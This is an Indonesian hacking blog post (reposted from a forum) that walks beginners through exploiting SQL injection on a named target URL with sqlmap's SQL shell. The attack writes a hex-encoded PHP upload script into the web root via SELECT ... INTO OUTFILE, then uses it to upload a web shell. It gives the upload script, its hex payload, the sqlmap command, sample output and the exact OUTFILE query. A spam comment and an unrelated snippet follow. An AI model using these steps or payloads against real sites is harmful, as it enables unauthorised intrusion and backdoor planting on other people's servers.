Breaking

Wednesday 13 March 2013

SQLMAP dan Upload shell


newbie cuma sekedar pengen sharing biar bisa sama2 belajar

tentunya agan2 sekalian udah pada tau dong sama tools yang namanya sqlmap, nih tools ajib buat sqli buat newbie kyk ane wawa

kali ini ane mau share ilmu newbie ane hasil nyontek sana sini, ane mau share cara upload shell pake sqlmap ..

pertama kita musti punya target dulu dong tentunya,
nih contoh target ane

Quote:http://dewa-maho.com/tusuk.php?id=5

trus siapin script upload ente gan, disini sebagai contoh ane mau upload scrip ini nih
PHP Code:
<form enctype="multipart/form-data" action="upload.php" method="POST"><input name="uploadedfile" type="file"/><input type="submit" value="Upload File"/></form> <?php $target_path=basename($_FILES['uploadedfile']['name']);if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$target_path)){echo basename($_FILES['uploadedfile']['name'])." has been uploaded";}else{echo "Error!";}?>

tapi sebelumnya convert dulu script diatas menjadi hex gan sebelum bisa di upload, hasilnya jadi gini nih
PHP Code:
3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d697422 ​ 2076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f616465 ​ 6466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e 

open terminal trus open sqlmap nya.. klo belom punya download di mari gan
Quote:http://sqlmap.org/

next:
Quote:python sqlmap.py -u http://dewa-maho.com/tusuk.php?id=5 --sql-shell

trus kluar kira2 beginian nih
Quote:[15:35:06] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5
[15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell>

sekarang ketik SELECT 0x'Hex' INTO OUTFILE "PATH/namaFile";
jangan lupa menambahkan '0x' di depan 'HEX'
Quote:select 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974 ​ 222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164 ​ 656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e
into "/home/relax/public_html/upload.php";

tunggu dan jika beruntung akan ada pemberitahuan berhasil di upload, klo apes ya coba lagi wawa

klo berhasil silahkan browse file kita tadi,
Quote:http://dewa-maho.com/upload.php

trus upload shell deh...
please

sumber : http://devilzc0de.org
6. http://ow.ly/jeHAY
http://bit.ly/11FVLd0

1 comment:

  1. Thanks Infonya Gan Jangan Lupa Visit Back http://www.stevin-germy.my.id

    ReplyDelete

Iphone X

Depending on the sum of water, some individuals have recommended waiting anywhere from 2 to seven days. If you try this system, change the ...